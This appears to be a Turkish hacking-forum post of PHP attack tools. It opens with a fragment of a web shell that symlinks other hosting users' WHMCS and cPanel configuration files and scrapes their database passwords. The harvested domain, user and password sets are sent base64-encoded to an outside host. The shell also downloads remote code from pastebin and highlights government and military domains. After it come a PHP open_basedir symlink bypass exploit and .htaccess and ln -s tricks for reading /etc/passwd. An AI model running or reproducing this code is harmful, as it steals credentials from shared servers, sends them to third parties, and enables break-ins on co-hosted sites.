$user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt'); } echo "<center>DonE with Success --> <a href='NoRSLaR.ORG' target='_blank'>Symlink'e git</a><br><center/>"; } } elseif(isset($_GET["home"])) { echo"<table><td align=center><body>
<h2><font color=green></font></h2>"; } elseif(isset($_GET["upl"])) { echo '<br><br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded !!!</b><br><br>'; }else { echo '<b>not uploaded !!!</b><br><br>'; }} } elseif(isset($_GET["cls"])) { @define('SELF_PATH', __FILE__); @unlink(__FILE__); echo exec("rm -rf NoRSLaR.ORG"); @unlink("bsn.php"); @unlink("WHMCS.html"); @unlink("VB.html"); @unlink("email.php"); @unlink("Wordpress.html"); @unlink("Joomla.html"); @unlink("Config.php"); @unlink("WHMCS KILLER V3.PHP"); } elseif(isset($_GET["cp"])) { @ini_set('display_errors',0); function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){ $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); return trim($ar1[0]); } echo '<br><br><style>
textarea {
resize:none;
color:black;
background-color:#ffffff;
font-size:8pt; color:black;
border:1px solid white ;
border-left: 4px solid white ;
}
input {
color: black;
border:1px dotted white;
}
</style>'; echo '<center>'; $d0mains = @file('/etc/named.conf'); $domains = scandir("/var/named"); if ($domains or $d0mains) { $domains = scandir("/var/named"); if($domains) { echo "<table align=center><tr><th valign=top bgcolor=black class=style2> COUNT </th><th valign=top bgcolor=black > DOMAIN </th><th valign=top bgcolor=black class=style2 > USER </th><th valign=top bgcolor=black class=style2 > Password </th><th valign=top bgcolor=black class=style2 > .my.cnf </th></tr>"; $count=1; $dc = 0; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $dirz = '/home/'.$owner['name'].'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$owner['name'].'.txt'); $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt'); $password=entre2v2($p,'password="','"'); echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$password."</td><td valign=top style=border :2px solid white id=menu style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>"; $dc++; $success3="http://".$domain."|".$owner['name']."|".$password."\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php"); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3)); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); $buffer = curl_exec($ch); } } } echo '</table>'; $total = $dc; echo '</center>'; }else{ $d0mains = @file('/etc/named.conf'); if($d0mains) { echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>"; $count=1; $dc = 0; $mck = array(); foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0]; } } } $mck = array_unique($mck); $usr = array(); $dmn = array(); foreach($mck as $o) { $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o)); $usr[] = $infos['name']; $dmn[] = $o; } array_multisort($usr,$dmn); $dt = file('/etc/passwd'); $passwd = array(); foreach($dt as $d) { $r = explode(':',$d); if(strpos($r[5],'home')) { $passwd[$r[0]] = $r[5]; } } $l=0; $j=1; foreach($usr as $r) { $dirz = '/home/'.$r.'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$r.'.txt'); $p=file_get_contents(''.$path.'/'.$r.'.txt'); $password=entre2v2($p,'password="','"'); echo "<tr><td valign=top bgcolor=darkgreen class=style2 style=width: 139px>".$count++."</td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px>'.$r."</td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px>".$password."</td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>"; $dc++; flush(); $l=$l?0:1; $j++; } } } echo '</table>'; $total = $dc; echo '<br><div class=result valign=top bgcolor=darkgreen class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />'; echo '</center>'; } }else{ echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>"; } } elseif(isset($_GET["jump"])) { $bsn=file_get_contents("http://pastebin.com/raw/GamMMrQL"); $fp=fopen("bsn.php", "w+"); fwrite($fp, $bsn); ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>'); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 35) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } echo '<br>'; echo "[+] Founded <font size=15 color=red> ".sizeof($users)." </font> entrys in /etc/passwd\n"."<br />"; echo "[+] Founded <font color=red size=15> ".sizeof($pub)." </font> readable public_html directories\n"."<br /><br /><br />"; foreach ($users as $user) { $path = "/home/$user/public_html/"; echo "<table bgcolor=black class=style2 ><td>"; echo "<font color=white><a target='_blank' href='bsn.php?y=$path'>$path<a/></font><br>"; echo "</td></table>"; } echo "\n"; } elseif(isset($_GET["pws"])) { echo "<br><br><br>"; echo'<form method="post">
<input type="text" name="conf" value="" />
<input type="submit" value="GeT Passwords" name="get" />
</form>'; $g = $_POST['get']; $dir = $_POST['conf']; if(isset($g) && $dir != ""){ $cn = @file_get_contents($dir); preg_match_all('#href="(.*?)"#',$cn,$m); foreach($m[1] as $txt){ $url = $dir.$txt; $cnurl = @file_get_contents($url); preg_match('#\'DB_PASSWORD\', \'(.*)\'#',$cnurl,$m1); preg_match('#password = \'(.*)\'#',$cnurl,$m2); preg_match('#password\'] = \'(.*)\'#',$cnurl,$m3); preg_match('#db_password = "(.*)"#',$cnurl,$m4); preg_match('#db_password = \'(.*)\'#',$cnurl,$m4); preg_match('#dbpass = "(.*)"#',$cnurl,$m5); preg_match('#password = \'(.*)\'#',$cnurl,$m6); preg_match('#dbpasswd = \'(.*)\'#',$cnurl,$m8); preg_match('#password_localhost = "(.*)"#',$cnurl,$m9); preg_match('#senha = "(.*)"#',$cnurl,$m10); if(!empty($m1[1])){ echo $m1[1]."<br>"; } elseif(!empty($m2[1])){ echo $m2[1]."<br>"; } elseif(!empty($m3[1])){ echo $m3[1]."<br>"; } elseif(!empty($m4[1])){ echo $m4[1]."<br>"; } elseif(!empty($m5[1])){ echo $m5[1]."<br>"; } elseif(!empty($m6[1])){ echo $m6[1]."<br>"; } elseif(!empty($m7[1])){ echo $m7[1]."<br>"; } elseif(!empty($m8[1])){ echo $m8[1]."<br>"; } elseif(!empty($m9[1])){ echo $m9[1]."<br>"; } elseif(!empty($m10[1])){ echo $m10[1]."<br>"; } } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink')) { echo " <form action= method=post>"; @set_time_limit(0); echo "<center>"; @mkdir('sym',0777); $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; } else { echo "<br><br><div class='tmp'><table border=1 bordercolor=#FF0000 width=500 cellpadding=1 cellspacing=0><td>Domains</td><td>Users</td><td>symlink </td>"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])) { $name = "<div style= color: #FF0000 ; text-shadow: 0px 0px 1px red; >".$string[1][0].'</div>'; } echo " <tr> <td> <div class=dom><a target=_blank href=http://www.".$string[1][0].'/>'.$name.' </a> </div> </td> <td> '.$UID['name']." </td> <td> <a href=sym/root/home/".$UID['name']."/public_html target=_blank>Symlink </a> </td> </tr></div> "; flush(); } } } } echo "</center></table>"; } echo "</div><center><b><br><br><br><font color=red>&copy 2017 Altı Sürümler Direcktroy zer0day</font></center><b>
<br><center>Turkz.org | Zer0day</center><br>"; echo base64_decode("PGltZyBzcmM9Imh0dHA6Ly93dzNzLndzL1RSL0hUTUw1L0NTUzMvZnNvY2l0eS5qcGciICBoZWlnaHQ9IjAiIHdpZHRoPSIwIj4="); ?>

====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
Symlink Bypass 404

<?php
/*
PHP 5.2.11/5.3.0 symlink() open_basedir bypass
by Zer0day - Turkz.org - sipahiler ----

CHUJWAMWMUZG
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img
src="TURKZ GRUP - Devlet-i Ebed Müddet"><P>This is exploit
from <a
href="CXSECURITY.COM Free Security List" title="turkz.org PHP">zer0day
Lab - SecurityReason</a> labs.
Author : KingSkrupellos
<p>Script for legal use only.
<p>PHP 5.2.11 5.3.0 symlink open_basedir bypass
<p>More: <a href="TURKZ GRUP - Devlet-i Ebed Müddet">zer0day</a>
<p><form name="form"
action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF
"]).'" method="post"><input type="text" name="file" size="50"
value="'.htmlspecialchars($file).'"><input type="submit" name="hym"
value="Create Symlink"></form>';

if(empty($file))
exit;

if(!is_writable("."))
die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
if(!file_exists($fakedir))
mkdir($fakedir);
chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$as++;
}
}
$as++;
while($as--)
chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
"symlink".$num))) break;
else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a
href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>

PHP Symbolic Link Open_Basedir Bypass Vulnerability

script1.php
<?
symlink("a/a/a/a/a/a/", "dummy");
symlink("dummy/../../../../../../etc/passwd", "xxx");
unlink("dummy");
while (1) {
symlink(".", "dummy");
unlink("dummy");
}
?>

script2.php
<?
while (1) {
print @file_get_contents("xxx");
}
?>
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
Simple Bypass İnternal Server Error Symlink 2016
A good way to bypass forbidden error when reading passwd file
The general approach:

ln -s / etc / passwd passwd.txt

Well, open the passwd file The forbidden error encountered
for bypass=>

To bypass coming from one of the following two commands are used:
Code: (Select All)
ln -s /etc/passwd README
ln -s /etc/passwd HEADER
The second command will run in a directory And when we go back to the directory where the file will be shown passwd us.
SPT to b0x

Bypass Symlink (Priv8)
How you can bypass Symlink in linux webserver ?

1/ Create a folder

2/ Upload inside

".htaccess"

CODE:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

3/ Bypass manually

ln -s /home/user/public_html/t0ph4cking.txt

Bypass Symlink 403 Forbidden with .htaccess

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
Kod:
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst